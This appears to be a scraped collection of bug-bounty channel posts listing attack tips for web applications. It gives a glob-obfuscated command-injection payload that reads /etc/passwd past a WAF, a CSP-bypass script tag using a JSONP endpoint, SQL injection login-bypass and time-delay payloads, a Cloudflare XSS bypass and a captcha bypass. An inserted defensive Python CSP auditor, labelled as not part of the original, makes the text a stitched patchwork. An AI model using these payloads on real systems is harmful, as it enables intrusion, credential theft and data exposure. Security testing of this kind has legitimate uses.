Top 25 Local File Inclusion (LFI) Parameters
#bugbounty #ethicalhacking
——————
0Day.Today
@LearnExploit
@Tech_Army
Not only crawling: you can also do subdomain enumeration using Wayback.
curl --insecure --silent "http://web.archive.org/cdx/search/cdx…" | sed -e 's_https*://__' -e "s/\/.*//" -e 's/:.*//' -e 's/^www\.//' | sed "/@/d" | sed -e 's/\.$//' | sort -u
#bugbounty
——————
Bypass Captcha (Google reCAPTCHA)
1. Try changing the request method, for example POST to GET
POST / HTTP/1.1
Host: target.com
...
_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123
#bugbounty #bypass
——————
RCE WAF Bypass
;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+\#
/???/??t+/???/??ss??
/?in/cat+/et?/passw?
#bugbounty #RCE #bypass
——————
Payload Injector:
➕ Debinject:
😸 GitHub
➕ Pixload:
😸 GitHub
➕ Gospider:
😸 GitHub
#Injection #Hacking_Tool #BugBounty
BugCod3
➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗
You can bypass CSP on any website that allows http://microsoft.com in a script-src
PoC:
<script src=http://microsoft.com/en-us/research/wp-json?_jsonp=alert></script>
This works because of the WordPress CSP bypass our engineer (octagon) found last year: octagon.net
#BugBounty #bypass #POC
——————
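A defensive check for the allowlist weakness in the CSP post above, as an added example that is not part of the original post: it parses a Content-Security-Policy value and flags host or scheme entries in the directive that governs script loads, since an allowlisted host is trusted for every script URL it serves. The sample policies and all function names are constructed for illustration.

```python
# Added example, not from the original post. Sample policies are constructed.
KEYWORDS = {"'self'", "'none'", "'unsafe-inline'", "'unsafe-eval'",
            "'unsafe-hashes'", "'wasm-unsafe-eval'", "'report-sample'"}
NONCE_OR_HASH = ("'nonce-", "'sha256-", "'sha384-", "'sha512-")

SAMPLE_ALLOWLIST = "default-src 'self'; script-src 'self' https://microsoft.com"
SAMPLE_STRICT = "script-src 'nonce-r4nd0m' 'strict-dynamic'; object-src 'none'"


def parse_csp(policy):
    """Split a policy into {directive: [sources]}; a repeated directive is ignored."""
    directives = {}
    for part in policy.split(";"):
        tokens = part.split()
        if tokens:
            directives.setdefault(tokens[0].lower(), tokens[1:])
    return directives


def audit_script_src(policy):
    """Return findings for the directive that governs <script src=...> loads."""
    directives = parse_csp(policy)
    # Fallback order for script elements: script-src-elem, script-src, default-src.
    name = next((d for d in ("script-src-elem", "script-src", "default-src")
                 if d in directives), None)
    if name is None:
        return ["no script-src or default-src: script loads are unrestricted"]
    sources = [s.lower() for s in directives[name]]
    if "'strict-dynamic'" in sources:
        return []  # CSP3 browsers ignore host and scheme sources in this case
    findings = []
    for src in sources:
        if src in KEYWORDS or src.startswith(NONCE_OR_HASH):
            continue
        if src == "*" or src.endswith(":"):
            findings.append(f"{name}: {src} places no host restriction on scripts")
        else:
            findings.append(f"{name}: host source {src} trusts every script URL "
                            "under it, including JSONP-style callback endpoints")
    return findings


if __name__ == "__main__":
    for policy in (SAMPLE_ALLOWLIST, SAMPLE_STRICT):
        print(policy, "->", audit_script_src(policy) or "no allowlist findings")
```

A finding is a prompt to replace the host entry with nonces or hashes; it does not by itself show that a callback endpoint exists on that host.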
Another #SQLi found! This time Microsoft SQL Server database vulnerable to stacked queries.
Payload ' or 1=1 -- - bypassed the login site, and then confirmed injection point with ';WAITFOR DELAY '0:0:5'-- executing a 5s delay
#VPD #BugBounty #security
——————
Cloudflare WAF bypass XSS
Any payload gets blocked by Cloudflare
This payload is working
"><img src=x onerrora=confirm() onerror=confirm(1)>
#Cloudflare #Bugbounty #Tip